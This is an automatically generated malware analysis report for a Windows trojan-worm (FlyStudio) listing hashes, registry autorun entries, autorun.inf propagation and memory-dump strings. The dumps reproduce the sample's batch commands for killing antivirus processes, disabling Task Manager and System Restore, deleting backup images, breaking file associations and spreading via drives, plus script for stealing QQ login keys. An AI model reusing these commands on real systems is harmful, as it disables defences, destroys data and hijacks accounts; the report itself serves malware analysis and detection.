Trojan.Win32.FlyStudio_0a9ae60a15

by malwarelabrobot on May 30th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Generic.Malware.SFMDYBVd.B6FAF71C (B) (Emsisoft), Generic.Malware.SFMDYBVd.B6FAF71C (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0a9ae60a1507dc9b0141dcb01ee413f6
SHA1: 296c491c9a00b5c9f4e825b6e2e3ecb2994cb742
SHA256: 8ce272c3e085a9f8da14abc2f56747ec9e50b771a2471e8c5e80cc664ec2e092
SSDeep: 6144:Zq9Eypeh23JV66dr1p VOWliICbpJouNjbb1FSEBqVg88GqgQxY8oEpeb:Q9N3JV6kr1cVOWdCLFfXf88GqgQxgEp
Size: 304640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: AirInstaller
Created at: 2013-08-20 20:07:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1808

File activity

The process %original file name%.exe:1808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\slear.exe (1425 bytes)

Registry activity

The process %original file name%.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A AD 27 89 AD 3E 4B 95 FA C7 91 0A 48 3B 37 B5"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name: 2013????
Product Name: ??????
Product Version: 1.6.0.0
Legal Copyright: 2013???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.6.0.0
File Description: 2013
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 651264 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 655360 290816 287232 5.49421 5f1aeacec80e299b97a3c0be6a619a2c
.rsrc 946176 16384 16384 2.49987 e2784112b04c223b0d25494fb365f9a9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
caf03e9cc3118627cd7c3d133a311224

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1808:

`.rsrc
t$(SSh
~%UVW
u$SShe
atl.dll
wininet.dll
kernel32.dll
advapi32.dll
NTDLL.DLL
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
sleartest.exe
dll.bat
\*.dll
exe.bat
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
http://ptlogin2.qq.com/jump?clientuin=
http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
http://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
http://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
http://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
http://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
http://
len = str.length; i < len;   i) hash  = (hash << 5)   str.charCodeAt(i);
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
a  = (a.indexOf("?") > -1 ? "&": "?")   "g_tk="   QZFL.pluginsDefine.getACSRFToken();
fm.action = a
slear && del / f / s / q c:\slear.bat
c:\slear.bat
cmd.exe
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
http://www.shafou.com
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat  r  s  h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf  r  s  h >>d:\setup.bat
attrib d:\setup.bat  r  s  h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat  r  s  h%
attrib %systemroot%/windows.bat  r  s  h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat  r  s  h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf  r  s  h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf  r  s  h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat  r  s  h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat  r  s  h >nul
http://www.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
goto 22c:\slears.bat
.slear
d:\sleartest.exe
adm-music.com
O%u,%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
www.dywt.com.cn
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
UnhookWindowsHookEx
.text
`.rdata
@.data
.rsrc
.W %C
%.wbe
PAD
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.6.0.0
(http://www.eyuyan.com)

%original file name%.exe_1808_rwx_00401000_000E4000:




t$(SSh
~%UVW
u$SShe
atl.dll
wininet.dll
kernel32.dll
advapi32.dll
NTDLL.DLL
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
sleartest.exe
dll.bat
\*.dll
exe.bat
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
http://ptlogin2.qq.com/jump?clientuin=
http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
http://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
http://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
http://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
http://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
http://
len = str.length; i < len;   i) hash  = (hash << 5)   str.charCodeAt(i);
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
a  = (a.indexOf("?") > -1 ? "&": "?")   "g_tk="   QZFL.pluginsDefine.getACSRFToken();
fm.action = a
slear && del / f / s / q c:\slear.bat
c:\slear.bat
cmd.exe
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
http://www.shafou.com
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat  r  s  h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf  r  s  h >>d:\setup.bat
attrib d:\setup.bat  r  s  h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
